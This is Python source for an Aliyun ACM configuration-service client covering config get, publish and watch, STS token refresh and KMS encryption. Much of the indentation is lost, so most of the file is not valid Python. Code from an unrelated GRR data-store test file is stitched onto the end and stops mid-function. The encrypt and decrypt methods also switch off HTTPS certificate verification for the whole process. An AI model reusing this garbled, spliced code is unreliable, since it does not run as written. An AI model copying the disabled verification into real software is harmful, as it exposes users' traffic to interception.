from urllib2 import Request, urlopen, HTTPError, URLError
from urllib import urlencode, unquote_plus
base64.encodebytes = base64.encodestring
from .commons import synchronized_with_attr, truncate, python_version_bellow
from .params import group_key, parse_key, is_valid
from .server import get_server_list
from .files import read_file, save_file, delete_file
logging.basicConfig()
logger = logging.getLogger()
# Module-wide debug switch; when True, ACMClient.set_debugging() runs at import time (see bottom of file).
DEBUG = False
VERSION = "0.4.10"
DEFAULT_GROUP_NAME = "DEFAULT_GROUP"
DEFAULT_NAMESPACE = ""
# Field / record separators used by the ACM long-pulling wire protocol
# (see parse_pulling_result and ACMClient._do_pulling).
WORD_SEPARATOR = u'\x02'
LINE_SEPARATOR = u'\x01'
# Flipped to True below once the optional Aliyun KMS SDK imports succeed.
kms_available = False
def _refresh_session_ak_and_sk_patch(self):
    """Fetch a fresh STS session credential from the ECS metadata service.

    Monkey-patched onto EcsRamRoleSigner (see the KMS import guard below).
    On success, stores the (ak, sk, token) triple in self._session_credential
    and the raw expiration string in self._expiration; on failure, logs the
    cause and leaves the previous credential in place.
    """
    try:
        request_url = "http://100.100.100.200/latest/meta-data/ram/security-credentials/" + self._credential.role_name
        content = urlopen(request_url).read()
        response = json.loads(content.decode('utf8'))
        if response.get("Code") != "Success":
            # FIX: use lazy %-formatting instead of string concatenation —
            # the old '+' form raised TypeError when "Code" was missing (None).
            logging.error('refresh Ecs sts token err, code is %s', response.get("Code"))
            return
        session_ak = response.get("AccessKeyId")
        session_sk = response.get("AccessKeySecret")
        token = response.get("SecurityToken")
        self._session_credential = session_ak, session_sk, token
        self._expiration = response.get("Expiration")
    except IOError as e:
        # FIX: logging.error('msg', e) passed e as a %-format argument with no
        # placeholder in the message, which raises a formatting error inside
        # the logging machinery instead of logging the actual cause.
        logging.error('refresh Ecs sts token err: %s', e)
def _check_session_credential_patch(self):
if not hasattr(self, '_expiration'):
self._refresh_session_ak_and_sk()
return
expiration = self._expiration if isinstance(self._expiration, (float, int)) \
else time.mktime(datetime.strptime(self._expiration, "%Y-%m-%dT%H:%M:%SZ").timetuple())
now = time.mktime(time.gmtime())
if expiration - now < 3 * 60:
self._refresh_session_ak_and_sk()
try:
    # Optional dependency: the Aliyun Python SDK provides KMS encrypt/decrypt
    # support.  When present, two EcsRamRoleSigner methods are replaced with
    # the patches defined above so STS credentials refresh from ECS metadata.
    from aliyunsdkcore.client import AcsClient
    from aliyunsdkkms.request.v20160120.DecryptRequest import DecryptRequest
    from aliyunsdkkms.request.v20160120.EncryptRequest import EncryptRequest
    from aliyunsdkcore.auth.credentials import EcsRamRoleCredential
    from aliyunsdkcore.auth.signers.ecs_ram_role_signer import EcsRamRoleSigner
    EcsRamRoleSigner._check_session_credential = _check_session_credential_patch
    EcsRamRoleSigner._refresh_session_ak_and_sk = _refresh_session_ak_and_sk_patch
    kms_available = True
except ImportError:
    logger.info("Aliyun KMS SDK is not installed")
# Data ids carrying this prefix are stored encrypted and transparently
# encrypted/decrypted through KMS when kms_enabled is on.
ENCRYPTED_DATA_ID_PREFIX = "cipher-"
# Built-in defaults; individual values can be overridden per client through
# ACMClient.set_options().
DEFAULTS = {
    "APP_NAME": "ACM-SDK-Python",
    "TIMEOUT": 3,  # in seconds
    "PULLING_TIMEOUT": 30,  # in seconds
    "PULLING_CONFIG_SIZE": 3000,
    "CALLBACK_THREAD_NUM": 10,
    "FAILOVER_BASE": "acm-data/data",
    "SNAPSHOT_BASE": "acm-data/snapshot",
    "KMS_ENABLED": False,
    "REGION_ID": "",
    "KEY_ID": "",
}
# Whitelist of attribute names accepted by ACMClient.set_options().
# NOTE(review): "callback_thread_num" here does not match the attribute name
# "callback_tread_num" (sic) that the client actually reads, so setting this
# option via set_options() has no effect — verify and fix in both places.
OPTIONS = set(
    ["default_timeout", "tls_enabled", "auth_enabled", "cai_enabled", "pulling_timeout", "pulling_config_size",
     "callback_thread_num", "failover_base", "snapshot_base", "app_name", "kms_enabled", "region_id",
     "kms_ak", "kms_secret", "key_id", "no_snapshot", "ram_role_name"])
class ACMException(Exception):
    """Base error type raised by this module for client-side failures."""
    pass
class ACMRequestException(ACMException):
    """Raised when no ACM server is reachable or a request cannot complete."""
    pass
def process_common_params(data_id, group):
    """Normalize and validate the (data_id, group) pair shared by all APIs.

    Falls back to DEFAULT_GROUP_NAME when group is None/empty/blank, strips
    surrounding whitespace from group, and raises ACMException when either
    value fails validation.
    """
    group = group.strip() if group and group.strip() else DEFAULT_GROUP_NAME
    if not data_id or not is_valid(data_id):
        raise ACMException("Invalid dataId.")
    if not is_valid(group):
        raise ACMException("Invalid group.")
    return data_id, group
def parse_pulling_result(result):
    """Decode a long-pulling response body into [dataId, group, tenant] triples.

    The server returns URL-encoded records separated by LINE_SEPARATOR, each
    holding fields separated by WORD_SEPARATOR.  Records missing the tenant
    field are padded with an empty string.  An empty/None payload yields an
    empty list.
    """
    if not result:
        return []
    entries = []
    for record in unquote_plus(result.decode()).split(LINE_SEPARATOR):
        if not record.strip():
            continue
        fields = record.split(WORD_SEPARATOR)
        if len(fields) < 3:
            fields.append("")
        entries.append(fields)
    return entries
def is_encrypted(data_id):
    """Return True if data_id names a KMS-encrypted item ("cipher-" prefix)."""
    return data_id.startswith(ENCRYPTED_DATA_ID_PREFIX)
class WatcherWrap:
    """Pairs a user callback with the cache key it watches.

    last_md5 records the digest of the last content delivered to the
    callback so repeated notifications with unchanged content are skipped.
    """

    def __init__(self, key, callback):
        self.watch_key = key
        self.callback = callback
        self.last_md5 = None
class CacheData:
    """In-memory cache entry for one config item (keyed by group_key).

    The initial value is seeded from local files — the failover directory
    takes precedence over the snapshot directory.  ``md5`` is computed over
    the GBK-encoded content (matching the server's change-detection digest)
    and ``is_init`` marks the entry as fresh so the first long-pull does not
    hang (see ACMClient._do_pulling).
    """

    def __init__(self, key, client):
        self.key = key
        # Failover value wins over snapshot value when both exist.
        local_value = read_file(client.failover_base, key) or read_file(client.snapshot_base, key)
        self.content = local_value
        src = local_value.decode("utf8") if type(local_value) == bytes else local_value
        # Digest over GBK bytes to stay consistent with the server side.
        self.md5 = hashlib.md5(src.encode("GBK")).hexdigest() if src else None
        self.is_init = True
        if not self.md5:
            logger.debug("[init-cache] cache for %s does not have local value" % key)
class ACMClient:
"""Client for ACM
available API:
* get
* add_watcher
* remove_watcher
"""
debug = False
@staticmethod
def set_debugging():
if not ACMClient.debug:
global logger
logger = logging.getLogger("acm")
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(name)s:%(message)s"))
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
ACMClient.debug = True
def __init__(self, endpoint, namespace=None, ak=None, sk=None, ram_role_name=None, unit_name=None):
self.endpoint = endpoint
self.namespace = namespace or DEFAULT_NAMESPACE or ""
self.ak = ak
self.sk = sk
self.ram_role_name = ram_role_name
self.server_list = None
self.server_list_lock = RLock()
self.current_server = None
self.server_offset = 0
self.server_refresh_running = False
self.watcher_mapping = dict()
self.pulling_lock = RLock()
self.puller_mapping = None
self.notify_queue = None
self.callback_tread_pool = None
self.process_mgr = None
self.default_timeout = DEFAULTS["TIMEOUT"]
self.tls_enabled = False
self.auth_enabled = (self.ak and self.sk) or self.ram_role_name
self.cai_enabled = True
self.pulling_timeout = DEFAULTS["PULLING_TIMEOUT"]
self.pulling_config_size = DEFAULTS["PULLING_CONFIG_SIZE"]
self.callback_tread_num = DEFAULTS["CALLBACK_THREAD_NUM"]
self.failover_base = DEFAULTS["FAILOVER_BASE"]
self.snapshot_base = DEFAULTS["SNAPSHOT_BASE"]
self.app_name = DEFAULTS["APP_NAME"]
self.kms_enabled = DEFAULTS["KMS_ENABLED"]
self.region_id = DEFAULTS["REGION_ID"]
self.key_id = DEFAULTS["KEY_ID"]
self.kms_ak = self.ak
self.kms_secret = self.sk
self.kms_client = None
self.no_snapshot = False
self.sts_token = None
self.unit_name = unit_name
logger.info("[client-init] endpoint:%s, tenant:%s" % (endpoint, namespace))
def set_options(self, **kwargs):
for k, v in kwargs.items():
if k not in OPTIONS:
logger.warning("[set_options] unknown option:%s, ignored" % k)
continue
if k == "kms_enabled" and v and not kms_available:
logger.warning("[set_options] kms can not be turned on with no KMS SDK installed")
continue
logger.debug("[set_options] key:%s, value:%s" % (k, v))
setattr(self, k, v)
def _refresh_server_list(self):
with self.server_list_lock:
if self.server_refresh_running:
logger.warning("[refresh-server] task is running, aborting")
return
self.server_refresh_running = True
while True:
try:
time.sleep(30)
logger.debug("[refresh-server] try to refresh server list")
server_list = get_server_list(self.endpoint, 443 if self.tls_enabled else 8080, self.cai_enabled,
self.unit_name)
logger.debug(
"[refresh-server] server_num:%s server_list:%s" % (len(server_list), server_list))
if not server_list:
logger.error("[refresh-server] empty server_list get from %s, do not refresh" % self.endpoint)
continue
with self.server_list_lock:
self.server_list = server_list
self.server_offset = 0
if self.current_server not in server_list:
logger.warning("[refresh-server] %s is not effective, change one" % str(self.current_server))
self.current_server = server_list[self.server_offset]
except Exception as e:
logger.exception("[refresh-server] exception %s occur" % str(e))
def change_server(self):
with self.server_list_lock:
self.server_offset = (self.server_offset + 1) % len(self.server_list)
self.current_server = self.server_list[self.server_offset]
def get_server(self):
if self.server_list is None:
with self.server_list_lock:
logger.info("[get-server] server list is null, try to initialize")
server_list = get_server_list(self.endpoint, 443 if self.tls_enabled else 8080, self.cai_enabled,
self.unit_name)
if not server_list:
logger.error("[get-server] empty server_list get from %s" % self.endpoint)
return None
self.server_list = server_list
self.current_server = self.server_list[self.server_offset]
logger.info("[get-server] server_num:%s server_list:%s" % (len(self.server_list), self.server_list))
if self.cai_enabled:
t = Thread(target=self._refresh_server_list)
t.setDaemon(True)
t.start()
logger.info("[get-server] use server:%s" % str(self.current_server))
return self.current_server
def remove(self, data_id, group, timeout=None):
""" Remove one data item from ACM.
:param data_id: dataId.
:param group: group, use "DEFAULT_GROUP" if no group specified.
:param timeout: timeout for requesting server in seconds.
:return: True if success or an exception will be raised.
"""
data_id, group = process_common_params(data_id, group)
logger.info(
"[remove] data_id:%s, group:%s, namespace:%s, timeout:%s" % (data_id, group, self.namespace, timeout))
params = {
"dataId": data_id,
"group": group,
}
if self.namespace:
params["tenant"] = self.namespace
try:
resp = self._do_sync_req("/diamond-server/datum.do?method=deleteAllDatums", None, None, params,
timeout or self.default_timeout)
logger.info("[remove] success to remove group:%s, data_id:%s, server response:%s" % (
group, data_id, resp.read()))
return True
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
logger.error(
"[remove] no right for namespace:%s, group:%s, data_id:%s" % (self.namespace, group, data_id))
raise ACMException("Insufficient privilege.")
else:
logger.error("[remove] error code [:%s] for namespace:%s, group:%s, data_id:%s" % (
e.code, self.namespace, group, data_id))
raise ACMException("Request Error, code is %s" % e.code)
except Exception as e:
logger.exception("[remove] exception %s occur" % str(e))
raise
def publish(self, data_id, group, content, timeout=None, app_name=None):
""" Publish one data item to ACM.
If the data key is not exist, create one first.
If the data key is exist, update to the content specified.
Content can not be set to None, if there is need to delete config item, use function **remove** instead.
:param data_id: dataId.
:param group: group, use "DEFAULT_GROUP" if no group specified.
:param content: content of the data item.
:param timeout: timeout for requesting server in seconds.
:param app_name: specify the name of the application to which this configuration belongs
:return: True if success or an exception will be raised.
"""
if content is None:
raise ACMException("Can not publish none content, use remove instead.")
data_id, group = process_common_params(data_id, group)
if type(content) == bytes:
content = content.decode("utf8")
if is_encrypted(data_id) and self.kms_enabled:
content = self.encrypt(content)
logger.info("[publish] data_id:%s, group:%s, namespace:%s, content:%s, timeout:%s" % (
data_id, group, self.namespace, truncate(content), timeout))
params = {
"dataId": data_id,
"group": group,
"content": content.encode("GBK"),
}
if self.namespace:
params["tenant"] = self.namespace
if app_name:
params["appName"] = app_name
try:
resp = self._do_sync_req("/diamond-server/basestone.do?method=syncUpdateAll", None, None, params,
timeout or self.default_timeout)
logger.info("[publish] success to publish content, group:%s, data_id:%s, server response:%s" % (
group, data_id, resp.read()))
return True
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
logger.error(
"[publish] no right for namespace:%s, group:%s, data_id:%s" % (self.namespace, group, data_id))
raise ACMException("Insufficient privilege.")
else:
logger.error("[publish] error code [:%s] for namespace:%s, group:%s, data_id:%s" % (
e.code, self.namespace, group, data_id))
raise ACMException("Request Error, code is %s" % e.code)
except Exception as e:
logger.exception("[publish] exception %s occur" % str(e))
raise
def get(self, data_id, group, timeout=None, no_snapshot=None):
content = self.get_raw(data_id, group, timeout, no_snapshot)
if content and is_encrypted(data_id) and self.kms_enabled:
return self.decrypt(content)
return content
def get_raw(self, data_id, group, timeout=None, no_snapshot=None):
"""Get value of one config item.
Query priority:
1. Get from local failover dir(default: "{cwd}/acm/data").
Failover dir can be manually copied from snapshot dir(default: "{cwd}/acm/snapshot") in advance.
This helps to suppress the effect of known server failure.
2. Get from one server until value is got or all servers tried.
Content will be save to snapshot dir.
3. Get from snapshot dir.
:param data_id: dataId.
:param group: group, use "DEFAULT_GROUP" if no group specified.
:param timeout: timeout for requesting server in seconds.
:param no_snapshot: do not save snapshot.
:return: value.
"""
no_snapshot = self.no_snapshot if no_snapshot is None else no_snapshot
data_id, group = process_common_params(data_id, group)
logger.info("[get-config] data_id:%s, group:%s, namespace:%s, timeout:%s" % (
data_id, group, self.namespace, timeout))
params = {
"dataId": data_id,
"group": group,
}
if self.namespace:
params["tenant"] = self.namespace
cache_key = group_key(data_id, group, self.namespace)
# get from failover
content = read_file(self.failover_base, cache_key)
if content is None:
logger.debug("[get-config] failover config is not exist for %s, try to get from server" % cache_key)
else:
logger.debug("[get-config] get %s from failover directory, content is %s" % (cache_key, truncate(content)))
return content
# get from server
try:
resp = self._do_sync_req("/diamond-server/config.co", None, params, None, timeout or self.default_timeout)
content = resp.read().decode("GBK")
except HTTPError as e:
if e.code == HTTPStatus.NOT_FOUND:
logger.warning(
"[get-config] config not found for data_id:%s, group:%s, namespace:%s, try to delete snapshot" % (
data_id, group, self.namespace))
delete_file(self.snapshot_base, cache_key)
return None
elif e.code == HTTPStatus.CONFLICT:
logger.error(
"[get-config] config being modified concurrently for data_id:%s, group:%s, namespace:%s" % (
data_id, group, self.namespace))
elif e.code == HTTPStatus.FORBIDDEN:
logger.error("[get-config] no right for data_id:%s, group:%s, namespace:%s" % (
data_id, group, self.namespace))
raise ACMException("Insufficient privilege.")
else:
logger.error("[get-config] error code [:%s] for data_id:%s, group:%s, namespace:%s" % (
e.code, data_id, group, self.namespace))
if no_snapshot:
raise
except Exception as e:
logger.exception("[get-config] exception %s occur" % str(e))
if no_snapshot:
raise
if no_snapshot:
return content
if content is not None:
logger.info(
"[get-config] content from server:%s, data_id:%s, group:%s, namespace:%s, try to save snapshot" % (
truncate(content), data_id, group, self.namespace))
try:
save_file(self.snapshot_base, cache_key, content)
except Exception as e:
logger.exception("[get-config] save snapshot failed for %s, data_id:%s, group:%s, namespace:%s" % (
data_id, group, self.namespace, str(e)))
return content
logger.error("[get-config] get config from server failed, try snapshot, data_id:%s, group:%s, namespace:%s" % (
data_id, group, self.namespace))
content = read_file(self.snapshot_base, cache_key)
if content is None:
logger.warning("[get-config] snapshot is not exist for %s." % cache_key)
else:
logger.debug("[get-config] get %s from snapshot directory, content is %s" % (cache_key, truncate(content)))
return content
def list(self, page=1, size=200):
""" Get config items of current namespace with content included.
Data is directly from acm server.
:param page: which page to query, starts from 1.
:param size: page size.
:return:
"""
logger.info("[list] try to list namespace:%s" % self.namespace)
params = {
"pageNo": page,
"pageSize": size,
"method": "getAllConfigByTenant",
}
if self.namespace:
params["tenant"] = self.namespace
try:
resp = self._do_sync_req("/diamond-server/basestone.do", None, params, None, self.default_timeout)
d = resp.read()
if isinstance(d, bytes):
d = d.decode("utf8")
return json.loads(d)
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
logger.error("[list] no right for namespace:%s" % self.namespace)
raise ACMException("Insufficient privilege.")
else:
logger.error("[list] error code [%s] for namespace:%s" % (e.code, self.namespace))
raise ACMException("Request Error, code is %s" % e.code)
except Exception as e:
logger.exception("[list] exception %s occur" % str(e))
raise
def list_all(self, group=None, prefix=None):
""" Get all config items of current namespace, with content included.
Warning: If there are lots of config in namespace, this function may cost some time.
:param group: only dataIds with group match shall be returned.
:param prefix: only dataIds startswith prefix shall be returned **it's case sensitive**.
:return:
"""
logger.info("[list-all] namespace:%s, group:%s, prefix:%s" % (self.namespace, group, prefix))
def _matches(ori):
return (group is None or ori["group"] == group) and (prefix is None or ori["dataId"].startswith(prefix))
result = self.list(1, 200)
if not result:
logger.warning("[list-all] can not get config items of %s" % self.namespace)
return list()
ret_list = [{"dataId": i["dataId"], "group": i["group"]} for i in result["pageItems"] if _matches(i)]
pages = result["pagesAvailable"]
logger.debug("[list-all] %s items got from acm server" % result["totalCount"])
for i in range(2, pages + 1):
result = self.list(i, 200)
ret_list += [{"dataId": j["dataId"], "group": j["group"]} for j in result["pageItems"] if _matches(j)]
logger.debug("[list-all] %s items returned" % len(ret_list))
return ret_list
@synchronized_with_attr("pulling_lock")
def add_watcher(self, data_id, group, cb):
self.add_watchers(data_id, group, [cb])
@synchronized_with_attr("pulling_lock")
def add_watchers(self, data_id, group, cb_list):
"""Add watchers to specified item.
1. Callback is invoked from current process concurrently by thread pool.
2. Callback is invoked at once if the item exists.
3. Callback is invoked if changes or deletion detected on the item.
:param data_id: dataId.
:param group: group, use "DEFAULT_GROUP" if no group specified.
:param cb_list: callback functions.
:return:
"""
if not cb_list:
raise ACMException("A callback function is needed.")
data_id, group = process_common_params(data_id, group)
logger.info("[add-watcher] data_id:%s, group:%s, namespace:%s" % (data_id, group, self.namespace))
cache_key = group_key(data_id, group, self.namespace)
wl = self.watcher_mapping.get(cache_key)
if not wl:
wl = list()
self.watcher_mapping[cache_key] = wl
for cb in cb_list:
wl.append(WatcherWrap(cache_key, cb))
logger.info("[add-watcher] watcher has been added for key:%s, new callback is:%s, callback number is:%s" % (
cache_key, cb.__name__, len(wl)))
if self.puller_mapping is None:
logger.debug("[add-watcher] pulling should be initialized")
self._init_pulling()
if cache_key in self.puller_mapping:
logger.debug("[add-watcher] key:%s is already in pulling" % cache_key)
return
for key, puller_info in self.puller_mapping.items():
if len(puller_info[1]) < self.pulling_config_size:
logger.debug("[add-watcher] puller:%s is available, add key:%s" % (puller_info[0], cache_key))
puller_info[1].append(cache_key)
self.puller_mapping[cache_key] = puller_info
break
else:
logger.debug("[add-watcher] no puller available, new one and add key:%s" % cache_key)
key_list = self.process_mgr
key_list.append(cache_key)
puller = Thread(target=self._do_pulling, args=(key_list, self.notify_queue))
puller.daemon = True
puller.start()
self.puller_mapping[cache_key] = (puller, key_list)
@synchronized_with_attr("pulling_lock")
def remove_watcher(self, data_id, group, cb, remove_all=False):
"""Remove watcher from specified key.
:param data_id: dataId.
:param group: group, use "DEFAULT_GROUP" if no group specified.
:param cb: callback function.
:param remove_all: weather to remove all occurrence of the callback or just once.
:return:
"""
if not cb:
raise ACMException("A callback function is needed.")
data_id, group = process_common_params(data_id, group)
if not self.puller_mapping:
logger.warning("[remove-watcher] watcher is never started.")
return
cache_key = group_key(data_id, group, self.namespace)
wl = self.watcher_mapping.get(cache_key)
if not wl:
logger.warning("[remove-watcher] there is no watcher on key:%s" % cache_key)
return
wrap_to_remove = list()
for i in wl:
if i.callback == cb:
wrap_to_remove.append(i)
if not remove_all:
break
for i in wrap_to_remove:
wl.remove(i)
logger.info("[remove-watcher] %s is removed from %s, remove all:%s" % (cb.__name__, cache_key, remove_all))
if not wl:
logger.debug("[remove-watcher] there is no watcher for:%s, kick out from pulling" % cache_key)
self.watcher_mapping.pop(cache_key)
puller_info = self.puller_mapping[cache_key]
puller_info[1].remove(cache_key)
if not puller_info[1]:
logger.debug("[remove-watcher] there is no pulling keys for puller:%s, stop it" % puller_info[0])
self.puller_mapping.pop(cache_key)
puller_info[0].terminate()
def _do_sync_req(self, url, headers=None, params=None, data=None, timeout=None):
url = "?".join([url, urlencode(params)]) if params else url
all_headers = self._get_common_headers(params, data)
if headers:
all_headers.update(headers)
logger.debug(
"[do-sync-req] url:%s, headers:%s, params:%s, data:%s, timeout:%s" % (
url, all_headers, params, data, timeout))
tries = 0
while True:
try:
server_info = self.get_server()
if not server_info:
logger.error("[do-sync-req] can not get one server.")
raise ACMRequestException("Server is not available.")
address, port, is_ip_address = server_info
server = ":".join([address, str(port)])
# if tls is enabled and server address is in ip, turn off verification
server_url = "%s://%s" % ("https" if self.tls_enabled else "http", server)
req = Request(url=server_url + url, data=urlencode(data).encode() if data else None,
headers=all_headers)
# for python version compatibility
if python_version_bellow("2.7.9"):
resp = urlopen(req, timeout=timeout)
else:
if self.tls_enabled and is_ip_address:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.check_hostname = False
else:
context = None
resp = urlopen(req, timeout=timeout, context=context)
logger.debug("[do-sync-req] info from server:%s" % server)
return resp
except HTTPError as e:
if e.code in [HTTPStatus.INTERNAL_SERVER_ERROR, HTTPStatus.BAD_GATEWAY,
HTTPStatus.SERVICE_UNAVAILABLE]:
logger.warning("[do-sync-req] server:%s is not available for reason:%s" % (server, e.msg))
else:
raise
except socket.timeout:
logger.warning("[do-sync-req] %s request timeout" % server)
except URLError as e:
logger.warning("[do-sync-req] %s connection error:%s" % (server, e.reason))
tries += 1
if tries >= len(self.server_list):
logger.error("[do-sync-req] %s maybe down, no server is currently available" % server)
raise ACMRequestException("All server are not available")
self.change_server()
logger.warning("[do-sync-req] %s maybe down, skip to next" % server)
def _do_pulling(self, cache_list, queue):
cache_pool = dict()
for cache_key in cache_list:
cache_pool[cache_key] = CacheData(cache_key, self)
while cache_list:
unused_keys = set(cache_pool.keys())
contains_init_key = False
probe_update_string = ""
for cache_key in cache_list:
cache_data = cache_pool.get(cache_key)
if not cache_data:
logger.debug("[do-pulling] new key added: %s" % cache_key)
cache_data = CacheData(cache_key, self)
cache_pool[cache_key] = cache_data
else:
unused_keys.remove(cache_key)
if cache_data.is_init:
contains_init_key = True
data_id, group, namespace = parse_key(cache_key)
probe_update_string += WORD_SEPARATOR.join(
[data_id, group, cache_data.md5 or "", self.namespace]) + LINE_SEPARATOR
for k in unused_keys:
logger.debug("[do-pulling] %s is no longer watched, remove from cache" % k)
cache_pool.pop(k)
logger.debug(
"[do-pulling] try to detected change from server probe string is %s" % truncate(probe_update_string))
headers = {"longPullingTimeout": int(self.pulling_timeout * 1000)}
if contains_init_key:
headers["longPullingNoHangUp"] = "true"
data = {"Probe-Modify-Request": probe_update_string}
changed_keys = list()
try:
resp = self._do_sync_req("/diamond-server/config.co", headers, None, data, self.pulling_timeout + 10)
changed_keys = [group_key(*i) for i in parse_pulling_result(resp.read())]
logger.debug("[do-pulling] following keys are changed from server %s" % truncate(str(changed_keys)))
except ACMException as e:
logger.error("[do-pulling] acm exception: %s, waiting for recovery" % str(e))
time.sleep(1)
except Exception as e:
logger.exception("[do-pulling] exception %s occur, return empty list, waiting for recovery" % str(e))
time.sleep(1)
for cache_key, cache_data in cache_pool.items():
cache_data.is_init = False
if cache_key in changed_keys:
data_id, group, namespace = parse_key(cache_key)
content = self.get_raw(data_id, group)
md5 = hashlib.md5(content.encode("GBK")).hexdigest() if content is not None else None
cache_data.md5 = md5
cache_data.content = content
queue.put((cache_key, cache_data.content, cache_data.md5))
@synchronized_with_attr("pulling_lock")
def _init_pulling(self):
if self.puller_mapping is not None:
logger.info("[init-pulling] puller is already initialized")
return
self.puller_mapping = dict()
self.notify_queue = Queue()
self.callback_tread_pool = pool.ThreadPool(self.callback_tread_num)
self.process_mgr = []
t = Thread(target=self._process_polling_result)
t.setDaemon(True)
t.start()
logger.info("[init-pulling] init completed")
def _process_polling_result(self):
while True:
cache_key, content, md5 = self.notify_queue.get()
logger.debug("[process-polling-result] receive an event:%s" % cache_key)
wl = self.watcher_mapping.get(cache_key)
if not wl:
logger.warning("[process-polling-result] no watcher on %s, ignored" % cache_key)
continue
data_id, group, namespace = parse_key(cache_key)
plain_content = content
if content and is_encrypted(data_id) and self.kms_enabled:
plain_content = self.decrypt(content)
params = {
"data_id": data_id,
"group": group,
"namespace": namespace,
"raw_content": content,
"content": plain_content,
}
for watcher in wl:
if not watcher.last_md5 == md5:
logger.debug(
"[process-polling-result] md5 changed since last call, calling %s" % watcher.callback.__name__)
try:
self.callback_tread_pool.apply(watcher.callback, (params,))
except Exception as e:
logger.exception("[process-polling-result] exception %s occur while calling %s " % (
str(e), watcher.callback.__name__))
watcher.last_md5 = md5
def _refresh_sts_token(self):
if self.sts_token:
if self.sts_token["client_expiration"] - time.mktime(time.gmtime()) > 3 * 60:
return
try:
resp = urlopen("http://100.100.100.200/latest/meta-data/ram/security-credentials/" + self.ram_role_name)
server_time = time.mktime(datetime.strptime(resp.headers["Date"], "%a, %d %b %Y %H:%M:%S GMT").timetuple())
sts_token = json.loads(resp.read().decode("utf8"))
expiration = time.mktime(datetime.strptime(sts_token["Expiration"], "%Y-%m-%dT%H:%M:%SZ").timetuple())
sts_token["client_expiration"] = expiration - server_time + time.mktime(time.gmtime())
self.sts_token = sts_token
except Exception as e:
logger.error("[refresh-sts-token] get sts token failed, due to %s" % e.message)
raise ACMRequestException("Refresh sts token failed.")
def _get_common_headers(self, params, data):
headers = {
"Diamond-Client-AppName": self.app_name,
"Client-Version": VERSION,
"exConfigInfo": "true",
}
if data:
headers["Content-Type"] = "application/x-www-form-urlencoded; charset=GBK"
if self.auth_enabled:
ts = str(int(time.time() * 1000))
if self.ram_role_name:
self._refresh_sts_token()
ak, sk = self.sts_token["AccessKeyId"], self.sts_token["AccessKeySecret"]
headers.update({
"Spas-SecurityToken": self.sts_token["SecurityToken"],
})
else:
ak, sk = self.ak, self.sk
headers.update({
"Spas-AccessKey": ak,
"timeStamp": ts,
})
sign_str = ""
# in case tenant or group is null
if not params and not data:
return headers
tenant = (params and params.get("tenant")) or (data and data.get("tenant"))
group = (params and params.get("group")) or (data and data.get("group"))
if tenant:
sign_str = tenant + "+"
if group:
sign_str = sign_str + group + "+"
if sign_str:
sign_str += ts
headers["Spas-Signature"] = base64.encodebytes(
hmac.new(sk.encode(), sign_str.encode(), digestmod=hashlib.sha1).digest()).decode().strip()
return headers
def _prepare_kms(self):
if not ((self.region_id and self.kms_ak and self.kms_secret) or (self.region_id and self.ram_role_name)):
return False
if not self.kms_client:
if self.ram_role_name:
self.kms_client = AcsClient(region_id=self.region_id,
credential=EcsRamRoleCredential(self.ram_role_name))
else:
self.kms_client = AcsClient(ak=self.kms_ak, secret=self.kms_secret, region_id=self.region_id)
return True
def encrypt(self, plain_txt):
if not self._prepare_kms():
return plain_txt
ssl._create_default_https_context = ssl._create_unverified_context
req = EncryptRequest()
req.set_KeyId(self.key_id)
req.set_Plaintext(plain_txt if type(plain_txt) == bytes else plain_txt.encode("utf8"))
resp = json.loads(self.kms_client.do_action_with_exception(req).decode("utf8"))
return resp["CiphertextBlob"]
def decrypt(self, cipher_blob):
    """Decrypt cipher_blob with KMS; return it unchanged if KMS is unavailable."""
    if not self._prepare_kms():
        return cipher_blob
    # NOTE(review): this disables HTTPS certificate verification process-wide.
    ssl._create_default_https_context = ssl._create_unverified_context
    request = DecryptRequest()
    request.set_CiphertextBlob(cipher_blob)
    raw = self.kms_client.do_action_with_exception(request)
    return json.loads(raw.decode("utf8"))["Plaintext"]
# Enable verbose client logging when the module-level DEBUG flag is set.
if DEBUG:
    ACMClient.set_debugging()
|
data_store_test.py | #!/usr/bin/env python
# -*- mode: python; encoding: utf-8 -*-
"""These are basic tests for the data store abstraction.
Implementations should be able to pass these tests to be conformant.
"""
import csv
import functools
import hashlib
import inspect
import logging
import operator
import os
import random
import string
import tempfile
import thread
import threading
import time
import mock
from grr.lib import access_control
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import data_store
from grr.lib import flow
from grr.lib import queue_manager
from grr.lib import rdfvalue
from grr.lib import sequential_collection
from grr.lib import test_lib
from grr.lib import threadpool
from grr.lib import worker
from grr.lib.aff4_objects import aff4_grr
from grr.lib.aff4_objects import collects
from grr.lib.aff4_objects import standard
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import flows as rdf_flows
from grr.lib.rdfvalues import paths as rdf_paths
class StringSequentialCollection(
    sequential_collection.IndexedSequentialCollection):
  """An indexed sequential collection holding plain RDF strings (test helper)."""
  RDF_TYPE = rdfvalue.RDFString
def DeletionTest(f):
  """Decorator: run the test only if the data store supports deletion."""

  @functools.wraps(f)
  def Wrapper(testinstance):
    if not testinstance.TEST_DELETION:
      # Deletion unsupported: report the test as skipped instead.
      return testinstance.skipTest("Tests that use deletion are disabled "
                                   "for this data store.")
    return f(testinstance)

  return Wrapper
def DBSubjectLockTest(f):
  """Decorator: run the test only if the data store supports subject locks."""

  @functools.wraps(f)
  def Wrapper(testinstance):
    if not testinstance.TEST_DBSUBJECTLOCKS:
      # Locks unsupported: report the test as skipped instead.
      return testinstance.skipTest("Tests that use locks are disabled "
                                   "for this data store.")
    return f(testinstance)

  return Wrapper
class _DataStoreTest(test_lib.GRRBaseTest):
  """Test the data store abstraction.

  Note that when testing timestamp behavior the cloud bigtable datastore only
  has ms precision.
  """
  # Subject rows shared by many tests below.
  test_row = "aff4:/row:foo"
  lease_row = u"aff4:/leasetest"
  # This flag controls if tests can also delete data. Some data stores don't
  # support deletion so those tests will fail for them.
  TEST_DELETION = True
  # The same applies to locks.
  TEST_DBSUBJECTLOCKS = True
def _ClearDB(self, subjects):
  """Delete every given subject and flush so the deletes are visible."""
  for subject in subjects:
    data_store.DB.DeleteSubject(subject, token=self.token)
  data_store.DB.Flush()
def setUp(self):
  """Initialize the store and clear all rows the tests below write to."""
